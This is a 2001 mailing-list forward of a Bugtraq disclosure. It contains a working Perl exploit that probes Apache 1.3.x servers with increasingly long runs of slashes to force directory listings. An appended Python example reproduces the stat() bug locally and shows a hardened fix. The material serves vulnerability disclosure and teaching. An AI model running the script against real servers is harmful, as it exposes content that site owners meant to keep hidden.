
[cobalt-security] Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit (fwd)



Is Cobalt going to upgrade?

With kind regards,

Peter Batenburg

ProServe
Prisma 100
3364 DJ Sliedrecht
Tel.: 0184 - 423 815
Fax: 0184 - 417 160
http://www.proserve.nl

**********************************************************************
This email and any files transmitted with it are confidential and
intended solely for the use of the individual or entity to whom they
are addressed. If you have received this email in error please notify
the sender by replying to the email and please remove
the files from your computer.

This footnote also confirms that this email message has been swept
for the presence of computer viruses.
**********************************************************************

---------- Forwarded message ----------
Date: Wed, 13 Jun 2001 02:44:35 -0500
From: Matt Watchinski <matt@xxxxxxxxx>
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit

#!/usr/bin/perl
#
# farm9, Inc. (copyright 2001)
#
# Name: Apache Artificially Long Slash Path Directory Listing Exploit
# Author: Matt Watchinski
# Ref: SecurityFocus BID 2503
#
# Affects: Apache 1.3.17 and below
# Tested on: Apache 1.3.12 running on Debian 2.2
#
# Info:  This exploit tricks apache into returning an Index of the
#    directory even if an index.html file is present.  May not work on some OS's
#
# Details: http_request.c has a subroutine called ap_sub_req_lookup_file that in
#          very specific cases would feed stat() a filename that was longer than
#          stat() could handle.  This would result in a condition where stat()
#          would return 0 and a directory index would be returned instead of the
#          default index.html.
#
# Code Fragment: /src/main/http_request.c
#    if (strchr(new_file, '/') == NULL) {
#        char *udir = ap_make_dirstr_parent(rnew->pool, r->uri);
#
#        rnew->uri = ap_make_full_path(rnew->pool, udir, new_file);
#        rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file);
#        ap_parse_uri(rnew, rnew->uri);    /* fill in parsed_uri values */
#        if (stat(rnew->filename, &rnew->finfo) < 0) {   <-- Important part
#            rnew->finfo.st_mode = 0;
#        }
#
# Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be enabled
#             The directory must also have the following Options enabled:
#             Indexes and MultiView
#             Some OS's have different conditions on the number of characters
#             you have to pass to stat to make this work.  If stat doesn't
#             return 0 for path names less than 8192 or so internal apache
#             buffer checks will stop this exploit from working.
#
# 	      Debian needed around 4060 /'s to make this work.
#
# Greets: Special thanks to natasha who added a lot of debug to apache for me
#	  while i was trying to figure out what had to be enabled to make this
#	  exploit work.  Also thanks to rfp for pointing out that MultiView
#	  needed to be enabled.
#
# More Greets:  Jeff for not shooting me :) <All your Cisco's belong to us>
#               Anne for being so sexy <I never thought corporate espionage
#                   would be so fun>
#               All my homies at farm9
#               DJ Charles / DJ NoloN for the phat beats
#               Marty (go go gadget snort)
#               All my ex-bees
#               RnVjazpIaXZlcndvcmxk
#
# I think that wraps it up.  Have fun.
#
# Usage: ./apacheIndex.pl <host> <port> <HI> <Low>
# Where: Hi and low are the range for the number of / to try
#

use strict;
use warnings;
use IO::Socket;

my $host = $ARGV[0]; # Host to try to connect to
my $port = $ARGV[1]; # Port to try to connect to
my $hi   = $ARGV[2]; # High number of slash characters to try
my $low  = $ARGV[3]; # Low number of slash characters to try

# Main loop.  Not much to this exploit once you figure out what needed to
# be enabled.  Need to do some more testing on sub-dirs to see if it
# works with them.  It should. Also different OS's might use a different
# number of /.  Send me the numbers if you don't mind matt@xxxxxxxxx

while ($low <= $hi)
{
  my $socket = IO::Socket::INET->new(PeerAddr => $host,
                                     PeerPort => $port,
                                     Proto    => "TCP")
    or die "Connect Failed";

  # Request line is a run of $low slashes, followed by the end of headers
  my $url = "GET " . ("/" x $low) . " HTTP/1.0\r\n" . "\r\n\r\n";

  print $socket $url;
  while (<$socket>)
  {
    if ($_ =~ /Index of/)
    {
      print "Found the magic number: $low\n";
      print "Now go do it by hand to see it all\n";
      close($socket);
      exit;
    }
  }

  close($socket);
  $low++;
}
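The bug pattern the Details section describes, where every stat() failure (including a path too long for the kernel) is collapsed into st_mode = 0 and then read as "index file absent", can be reproduced outside Apache. The following Python script is an added example and is not code from the forwarded post, from farm9 or from the Apache project: it builds a throwaway document root containing an index.html, mirrors the quoted http_request.c logic in lookup_vulnerable(), and shows the corrected handling in lookup_hardened(), which treats only ENOENT/ENOTDIR as "absent" and refuses the request on any other errno. The 5000-slash request path, the function names and the outcome labels are constructed for this example; the PATH_MAX figure is Linux's.

```python
import errno
import os
import stat
import tempfile

# Constructed sample: a run of slashes long enough to push the assembled
# filename past the kernel's path limit (PATH_MAX is 4096 on Linux; the
# post reports about 4060 slashes being enough on Debian).
LONG_SLASH_RUN = 5000

INDEX_FILE = "index.html"


def _index_path(docroot, uri):
    """Assemble docroot + request path + DirectoryIndex name the way the
    quoted ap_make_full_path() calls do: plain concatenation, no
    normalisation of repeated slashes."""
    return docroot + uri + INDEX_FILE


def lookup_vulnerable(docroot, uri):
    """Mirror of the quoted http_request.c fragment: any stat() failure
    zeroes st_mode, and a zero st_mode is later read as 'no index file',
    so the server falls through to the directory index."""
    try:
        st_mode = os.stat(_index_path(docroot, uri)).st_mode
    except OSError:
        st_mode = 0  # the bug: ENAMETOOLONG looks exactly like ENOENT here
    if stat.S_ISREG(st_mode):
        return "index.html"
    return "directory-listing"


def lookup_hardened(docroot, uri):
    """Same lookup, but only a genuinely missing file means 'absent';
    every other stat() error (ENAMETOOLONG, EACCES, ELOOP, ...) is
    reported as an error instead of being guessed around."""
    try:
        st_mode = os.stat(_index_path(docroot, uri)).st_mode
    except OSError as exc:
        if exc.errno in (errno.ENOENT, errno.ENOTDIR):
            return "directory-listing"
        return "error"  # a real server would answer 403/500 here, never a listing
    if stat.S_ISREG(st_mode):
        return "index.html"
    return "directory-listing"


def demo():
    """Run both lookups against a constructed docroot that does contain an
    index.html, with a normal request path and with the long slash run."""
    with tempfile.TemporaryDirectory() as docroot:
        with open(os.path.join(docroot, INDEX_FILE), "w") as fh:
            fh.write("<html>real index page</html>\n")
        normal = "/"
        long_run = "/" * LONG_SLASH_RUN
        return {
            "vuln_normal": lookup_vulnerable(docroot, normal),
            "vuln_long": lookup_vulnerable(docroot, long_run),
            "hard_normal": lookup_hardened(docroot, normal),
            "hard_long": lookup_hardened(docroot, long_run),
            "hard_missing": lookup_hardened(docroot, "/nosuchdir/"),
        }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:12s} -> {outcome}")
```

The point of the hardened version is the errno check: a negative return from stat() is not one condition but many, and only the "file is not there" cases justify the fallback to a listing. Any other failure means the server could not establish what the requested object is, and the safe answer to that is to refuse the request rather than to pick the most permissive interpretation.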